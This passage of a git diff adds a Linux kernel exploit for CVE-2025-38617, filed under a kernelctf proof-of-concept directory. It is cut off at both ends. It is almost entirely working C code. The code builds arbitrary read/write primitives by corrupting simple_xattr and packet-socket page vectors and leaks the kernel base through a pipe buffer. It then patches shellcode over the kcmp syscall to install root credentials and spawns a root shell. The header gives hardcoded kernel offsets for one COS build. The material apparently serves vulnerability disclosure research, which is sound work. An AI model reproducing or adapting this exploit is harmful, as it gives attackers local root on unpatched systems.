timer_interrupt_amplitude +) +{ + simple_xattr_read_write_primitive_main_work( + simple_xattr_read_write_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + timer_interrupt_amplitude, + decrease_tpacket_rcv_thread_sleep_time, + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address + ); + + bool overflow_success = false; + for (int i = 0; i < ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets) && !overflow_success; i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] == 0) + continue; + + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + void *mem = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i], + 0 + ); + + struct simple_xattr *simple_xattr = mem + 3 * PAGE_SIZE; + if (is_data_look_like_simple_xattr(simple_xattr, KMALLOC_8K_SIZE)) { + simple_xattr_dump(simple_xattr); + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket = simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] = 0; + simple_xattr_read_write_primitive->manipulated_simple_xattr_request = pages_order2_read_primitive->leaked_content_simple_xattr_request; + pages_order2_read_primitive->leaked_content_simple_xattr_request = NULL; + overflow_success = true; + } + + Munmap(mem, mmap_size); + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain_cleanup(simple_xattr_read_write_primitive); + simple_xattr_read_write_primitive_pg_vec_cleanup(simple_xattr_read_write_primitive); + + if (overflow_success) { + for (int i = 0; i < ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets); i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] != -1) { + Close(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]); + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + } + } + } + + return overflow_success; +} + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + simple_xattr_read_write_primitive->mmap_address = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket, + 0 + ); + + struct simple_xattr *simple_xattr = simple_xattr_read_write_primitive->mmap_address + 3 * PAGE_SIZE; + return simple_xattr; + +} + +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + Munmap(simple_xattr_read_write_primitive->mmap_address, mmap_size); + simple_xattr_read_write_primitive->mmap_address = NULL; +} + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + ssize_t getxattr_ret = 0; + u8 value_set[XATTR_SIZE_MAX] = {}; + u8 value_get[XATTR_SIZE_MAX] = {}; + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + u64 original_manipulated_simple_xattr_name_pointer = (u64)(manipulated_simple_xattr->name); + u64 original_manipulated_simple_xattr_list_next_pointer = (u64)(manipulated_simple_xattr->list.next); + u64 fake_simple_xattr_name_addr = 0; + u64 fake_simple_xattr_addr = 0; + int overwritten_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + bool abr_page_read_write_primitive_build_success = false; + + while (!abr_page_read_write_primitive_build_success) { + bool fake_simple_xattr_name_success = false; + int fake_simple_xattr_name_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_name_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr->list.prev; + fprintf(stderr, "fake_simple_xattr_name_addr: 0x%016lx\n", fake_simple_xattr_name_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_name_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + strcpy(mem, FAKE_SIMPLE_XATTR_NAME); + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (char *)(fake_simple_xattr_name_addr); + + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + fake_simple_xattr_name_success = true; + } + + manipulated_simple_xattr->name = (char *)original_manipulated_simple_xattr_name_pointer; + + if (!fake_simple_xattr_name_success) { + free_pages(fake_simple_xattr_name_packet_socket); + } + } + + fprintf(stderr, "fake_simple_xattr_name_success\n"); + + bool fake_simple_xattr_success = false; + int fake_simple_xattr_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + fake_simple_xattr_addr = (u64)manipulated_simple_xattr->list.prev; + fprintf(stderr, "fake_simple_xattr_addr: 0x%016lx\n", fake_simple_xattr_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + strcpy(mem, DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION); + + manipulated_simple_xattr->name = (void *)fake_simple_xattr_addr; + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + memset(mem, 0, 1 * PAGES_ORDER2_SIZE); + struct simple_xattr *fake_simple_xattr = mem; + fake_simple_xattr->list.next = (void *)fake_simple_xattr_addr; + fake_simple_xattr->list.prev = (void *)fake_simple_xattr_addr; + fake_simple_xattr->name = (void *)fake_simple_xattr_name_addr; + fake_simple_xattr->size = KMALLOC_8K_SIZE; + + manipulated_simple_xattr->list.next = (void *)fake_simple_xattr_addr; + fake_simple_xattr_success = true; + } else { + free_pages(fake_simple_xattr_packet_socket); + } + + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (void *)original_manipulated_simple_xattr_name_pointer; + } + + fprintf(stderr, "fake_simple_xattr_success\n"); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME + ); + + alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + struct pgv *pgv = NULL; + + if (mem != MAP_FAILED && is_data_look_like_pgv(mem, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_name_packet_socket; + pgv = mem; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } else if (mem1 != MAP_FAILED && is_data_look_like_pgv(mem1, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_packet_socket; + pgv = mem1; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } + + if (mem != MAP_FAILED) + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + + if (mem1 != MAP_FAILED) + Munmap(mem1, 1 * PAGES_ORDER2_SIZE); + + if (abr_page_read_write_primitive_build_success) { + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec = overwritten_pg_vec_packet_socket; + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size = 1 * PAGES_ORDER2_SIZE; + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + } else { + free_pages(overwritten_pg_vec_packet_socket); + } + } + + manipulated_simple_xattr->list.next = (void *)original_manipulated_simple_xattr_list_next_pointer; + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); +} + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = {}; + simple_xattr_read_write_primitive_init(&simple_xattr_read_write_primitive); + + struct timespec simple_xattr_read_write_primitive_sleep_decrease_amplitude = { .tv_nsec = 15000 }; + struct timespec simple_xattr_read_write_primitive_timer_interrupt_amplitude = { .tv_nsec = 160000 }; + + bool simple_xattr_read_write_primitive_build_success = false; + while (!simple_xattr_read_write_primitive_build_success) { + simple_xattr_read_write_primitive_build_success = simple_xattr_read_write_primitive_build_primitive( + &simple_xattr_read_write_primitive, + pages_order2_read_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + simple_xattr_read_write_primitive_sleep_decrease_amplitude, + simple_xattr_read_write_primitive_timer_interrupt_amplitude + ); + } + + return simple_xattr_read_write_primitive; +} + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +) +{ + if (page_aligned_addr_to_mmap & (PAGE_SIZE - 1)) { + fprintf(stderr, "[abr_page_read_write_primitive_mmap]: page_aligned_addr_to_mmap is not page aligned\n"); + return NULL; + } + + void *mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)page_aligned_addr_to_mmap; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); + + mem = mmap( + NULL, + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec, + 0 + ); + + if (mem == MAP_FAILED) + return NULL; + + return mem; +} + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +) +{ + Munmap(mem, abr_page_read_write_primitive->overwritten_pg_vec_mmap_size); + mem = Mmap( + NULL, + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec, + 0 + ); + + struct pgv *pgv = mem; + pgv[0].buffer = (char *)abr_page_read_write_primitive->original_buffer_page_addr; + Munmap(mem, abr_page_read_write_primitive->overwrite_pg_vec_mmap_size); +} + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive) +{ + u64 sys_kcmp_page = __do_sys_kcmp & PAGE_MASK; + u64 sys_kcmp_offset_from_page = __do_sys_kcmp - sys_kcmp_page; + + void *m = abr_page_read_write_primitive_mmap( + abr_page_read_write_primitive, + sys_kcmp_page + ); + + void *overwrite_ptr = m + sys_kcmp_offset_from_page; + void *shellcode = (void *)privilege_escalation_shellcode_begin; + int shellcode_length = (void *)privilege_escalation_shellcode_end - (void *)privilege_escalation_shellcode_begin; + void *saved_opcodes = Calloc(1, shellcode_length); + memcpy(saved_opcodes, overwrite_ptr, shellcode_length); + memcpy(overwrite_ptr, shellcode, shellcode_length); + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, m); + return saved_opcodes; +} + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + + u64 kernel_base = 0; + bool found_pipe_buffer = false; + + while (!found_pipe_buffer) { + int pipe_fd[2] = {}; + Pipe2(pipe_fd, O_DIRECT); + + u8 value[XATTR_SIZE_MAX] = {}; + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME, + value, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + u64 pipe_buffer_addr = (u64)manipulated_simple_xattr->list.prev; + fprintf(stderr, "pipe_buffer_addr: 0x%016lx\n", pipe_buffer_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME + ); + + Fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 * PAGE_SIZE); + Write(pipe_fd[1], DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN, strlen(DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN)); + + void *mem = abr_page_read_write_primitive_mmap(abr_page_read_write_primitive, pipe_buffer_addr); + if (mem != NULL) { + if (is_data_look_like_pipe_buffer(mem)) { + struct pipe_buffer *pipe_buffer = mem; + kernel_base = (u64)pipe_buffer->ops - anon_pipe_buf_ops_offset_from_kernel_base; + found_pipe_buffer = true; + } + + abr_page_read_write_primitive_munmap(abr_page_read_write_primitive, mem); + } + + Close(pipe_fd[0]); + Close(pipe_fd[1]); + } + + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); + return kernel_base; +} + +int main(void) +{ + setup_nofile_rlimit(); + setup_namespace(); + setup_tmpfs(); + + int timerfd = Timerfd_create(CLOCK_MONOTONIC, 0); + struct necessary_threads *necessary_threads = necessary_threads_create(timerfd); + + dummy_network_interface_create(DUMMY_INTERFACE_NAME, IPV6_MIN_MTU - 1); + int configure_network_interface_socket = Socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + + struct pages_order2_read_primitive pages_order2_read_primitive = pages_order2_read_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd + ); + + fprintf(stderr, "pages_order2_read_primitive build success\n"); + + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = simple_xattr_read_write_primitive_build( + necessary_threads, + configure_network_interface_socket, + timerfd, + &pages_order2_read_primitive + ); + + fprintf(stderr, "simple_xattr_read_write_primitive build success\n"); + + struct abr_page_read_write_primitive abr_page_read_write_primitive = {}; + abr_page_read_write_primitive_build_primitive( + &abr_page_read_write_primitive, + &simple_xattr_read_write_primitive, + &pages_order2_read_primitive + ); + + fprintf(stderr, "abr_page_read_write_primitive_build_primitive success\n"); + + u64 kernel_base = find_kernel_base(&abr_page_read_write_primitive, &simple_xattr_read_write_primitive); + fprintf(stderr, "[+] kernel base: 0x%016lx\n", kernel_base); + update_kernel_address(kernel_base); + void *sys_kcmp_saved_opcodes = patch_sys_kcmp(&abr_page_read_write_primitive); + + int not_used = -1; + syscall(SYS_kcmp, (u32)(init_cred >> 32), (u32)(init_cred), not_used, init_fs, __x86_return_thunk); + + char *sh_args[] = {"sh", NULL}; + execve("/bin/sh", sh_args, NULL); +} diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.h b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.h new file mode 100644 index 000000000..30b80f7ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.h @@ -0,0 +1,678 @@ +#ifndef EXPLOIT_H +#define EXPLOIT_H + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef int64_t s64; +typedef uint64_t u64; +typedef uint32_t u32; +typedef uint16_t u16; +typedef uint8_t u8; + +struct pgv { + char *buffer; +}; + +static_assert(sizeof(struct pgv) == 8, "sizeof(struct pgv) not match with kernel"); + +static inline bool is_data_look_like_pgv(struct pgv *pgv, size_t count) +{ + bool is_pgv = true; + + for (size_t i = 0; i < count && is_pgv; i++) { + u64 kernel_page_addr = (u64)(pgv[i].buffer); + if ((kernel_page_addr >> 48) != 0xFFFF) + is_pgv = false; + } + + return is_pgv; +} + +static inline void pgv_dump(struct pgv *pgv, size_t len) +{ + for (size_t i = 0; i < len; i++) { + printf("pgv[%zu] = 0x%016lx\n", i, (u64)(pgv[i].buffer)); + } +} + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +static_assert(sizeof(struct list_head) == 16, "sizeof(struct list_head) not match with kernel"); + +struct simple_xattr { + struct list_head list; + char *name; + size_t size; + char value[]; +}; + +static_assert(sizeof(struct simple_xattr) == 32, "sizeof(struct simple_xattr) not match with kernel"); + +#define UNUSED_FUNCTION_PARAMETER(x) (void)(x) +#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0])) + +#define KMALLOC_8K_SIZE 8192 +#define KMALLOC_8_SIZE 8 +#define PAGE_SIZE 4096UL +#define PAGE_MASK (~(PAGE_SIZE - 1)) +#define PAGES_ORDER1_SIZE (PAGE_SIZE * 2) +#define PAGES_ORDER2_SIZE (PAGE_SIZE * 4) +#define PAGES_ORDER3_SIZE (PAGE_SIZE * 8) +#define PAGES_ORDER4_SIZE (PAGE_SIZE * 16) +#define PAGES_ORDER5_SIZE (PAGE_SIZE * 32) +#define CPU_NUMBER_ZERO 0 +#define CPU_NUMBER_ONE 1 +#define NSEC_PER_SEC 1000000000L +#define NSEC_PER_USEC 1000L +#define USEC_PER_SEC 1000000L +#define TOTAL_TIMERFD_WAITLIST_THREADS 180 + +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 ((KMALLOC_8K_SIZE / sizeof(struct pgv)) + 1) +#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16 ((KMALLOC_8_SIZE / sizeof(struct pgv)) + 1) + +#define PAGE_COUNT_TO_ALLOCATE_PIPE_BUFFER_ON_PAGES_ORDER2 256 +#define DATA_TO_TRIGGER_PIPE_BUFFER_FILLIN "fillin_pipe_buffer" + +#define MAX_FILTER_LEN 700 +#define MAX_NICE 19 + +#define TMPFS_MOUNT_POINT "/tmp/tmpfs" +#define DUMMY_INTERFACE_NAME "pwn_dummy" + +#define __rb_parent(pc) ((struct rb_node *)(pc & ~3)) + +u64 anon_pipe_buf_ops_last_24_bits = 0xc22580; +u64 anon_pipe_buf_ops_offset_from_kernel_base = 0x1c22580; +u64 struct_task_struct_member_cred_offset = 0x7d8; +u64 struct_task_struct_member_real_cred_offset = 0x7d0; +u64 struct_task_struct_member_fs_offset = 0x828; +u64 init_cred = 0x2a75f00; +u64 init_fs = 0x2bb4860; +u64 __x86_return_thunk = 0x16054b0; +u64 __do_sys_kcmp = 0x23c850; + +static inline void update_kernel_address(u64 kernel_base) +{ + init_cred += kernel_base; + init_fs += kernel_base; + __x86_return_thunk += kernel_base; + __do_sys_kcmp += kernel_base; +} + +static inline bool is_data_look_like_simple_xattr(void *data, size_t value_size) +{ + struct simple_xattr *simple_xattr = data; + struct list_head *list = &simple_xattr->list; + + if ( + (((u64)(list->next) >> 48) == 0xFFFF) && + (((u64)(list->prev) >> 48) == 0xFFFF) && + (((u64)(simple_xattr->name) >> 48) == 0xFFFF) && + (simple_xattr->size == value_size) + ) + return true; + + return false; +} + +static inline void simple_xattr_dump(struct simple_xattr *simple_xattr) +{ + struct list_head *list = &(simple_xattr->list); + printf("====== simple_xattr_dump ======\n"); + printf("list->next: 0x%016lx\n", (u64)(list->next)); + printf("list->prev: 0x%016lx\n", (u64)(list->prev)); + printf("name: 0x%016lx\n", (u64)(simple_xattr->name)); + printf("value_size: 0x%016lx\n", (u64)(simple_xattr->size)); + printf("value: %s\n", (char *)(simple_xattr->value)); +} + +struct pipe_buffer { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; + unsigned long private; +}; + +static_assert(sizeof(struct pipe_buffer) == 40, "sizeof(struct pipe_buffer) not match with kernel"); + +static inline bool is_data_look_like_pipe_buffer(struct pipe_buffer *pipe_buffer) +{ + if ( + (((u64)(pipe_buffer->page) >> 48) == 0xFFFF) && + (((u64)(pipe_buffer->ops) & 0xFFFFFF) == anon_pipe_buf_ops_last_24_bits) + ) + return true; + + return false; +} + +static inline void pipe_buffer_dump(struct pipe_buffer *pipe_buffer) +{ + printf("====== pipe_buffer_dump ======\n"); + printf("page: 0x%016lx\n", (u64)(pipe_buffer->page)); + printf("offset: %u, len: %u\n", pipe_buffer->offset, pipe_buffer->len); + printf("ops: 0x%016lx\n", (u64)(pipe_buffer->ops)); + printf("flags: %u\n", pipe_buffer->flags); + printf("private: 0x%016lx\n", pipe_buffer->private); +} + +/* Error handling */ +void unix_error(const char *msg); +void Mnl_socket_error(const char *msg); +void Pthread_error(const char *msg, int error_code); +/* Error handling */ + +/* libc wrapper */ + +void Unshare(int flags); +int Socket(int domain, int type, int protocol); +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen); +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen); +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen); +void Ioctl(int fd, unsigned long request, unsigned long arg); +void Close(int fd); +int Dup(int fd); +void Pipe2(int pipefd[2], int flags); +int Fcntl(int fd, int op, unsigned long arg); +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset); +void Munmap(void *addr, size_t len); +FILE *Fopen(const char *filename, const char *modes); +void Fclose(FILE *stream); +void *Calloc(size_t nmemb, size_t size); +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags); +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg); +void Pthread_join(pthread_t thread, void **retval); +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset); +void Getrlimit(int resource, struct rlimit *rlim); +void Setrlimit(int resource, const struct rlimit *rlim); +void Setpriority(int which, id_t who, int value); +int Timerfd_create(int clockid, int flags); +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value); +int Epoll_create1(int flags); +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event); +unsigned int If_nametoindex(const char *ifname); +void Mkdir(const char *pathname, mode_t mode); +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data); +int Open(const char *pathname, int flags, mode_t mode); +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags); +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size); +void Removexattr(const char *path, const char *name); +char *Strdup(const char *s); +ssize_t Read(int fd, void *buf, size_t count); +ssize_t Write(int fd, const void *buf, size_t count); +/* libc wrapper */ + +/* libmnl wrapper */ +struct mnl_socket *Mnl_socket_open(int bus); +void Mnl_socket_close(struct mnl_socket *nl); +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid); +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size); +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size); +/* libmnl wrapper */ + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq); +void dummy_network_interface_create(const char *ifname, u32 mtu); +void network_interface_up(int configure_socket_fd, const char *ifname); +void network_interface_down(int configure_socket_fd, const char *ifname); +void pin_thread_on_cpu(int cpu); +void setup_namespace(void); +void setup_tmpfs(void); +void setup_nofile_rlimit(void); +void create_file(const char *path); +bool thread_in_sleep_state(int tid); +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size); +void free_pages(int packet_socket); + +struct victim_packet_socket_config { + struct __kernel_sock_timeval sndtimeo; + struct sockaddr_ll addr; + struct tpacket_req3 tx_ring; + struct tpacket_req3 rx_ring; + int packet_loss; + int packet_version; + unsigned packet_reserve; + struct sock_filter filter[MAX_FILTER_LEN]; +}; + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +); + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config); + +struct victim_packet_socket { + struct victim_packet_socket_config *config; + int fd; +}; + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config); +void victim_packet_socket_destroy(struct victim_packet_socket *v); +void victim_packet_socket_configure(struct victim_packet_socket *v); + +struct simple_xattr_request { + char filepath[PATH_MAX]; + char name[XATTR_NAME_MAX + 1]; + char *value; + size_t value_size; + bool allocated; +}; + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +); + +void simple_xattr_request_destroy(struct simple_xattr_request *request); + +struct timerfd_waitlist_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + int timerfd; + int *timerfds; + int total_timerfd; + struct epoll_event *epoll_events; +}; + +void *timerfd_waitlist_thread_fn(void *arg); +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t); +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd); +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t); + +struct pg_vec_lock_thread_work { + struct victim_packet_socket *victim_packet_socket; + int ifindex; +}; + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex); +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w); + +struct pg_vec_lock_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + atomic_int tid; + int packet_socket; + int ifindex; + struct pg_vec_lock_thread_work *work; +}; + +void *pg_vec_lock_thread_fn(void *arg); +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w); +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t); +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void); +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t); + +struct pg_vec_buffer_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + struct pg_vec_buffer_thread_work *work; +}; + +struct pg_vec_buffer_thread_work { + struct victim_packet_socket *victim_packet_socket; + bool exploit; + bool cleanup; +}; + +struct pg_vec_buffer_thread_work 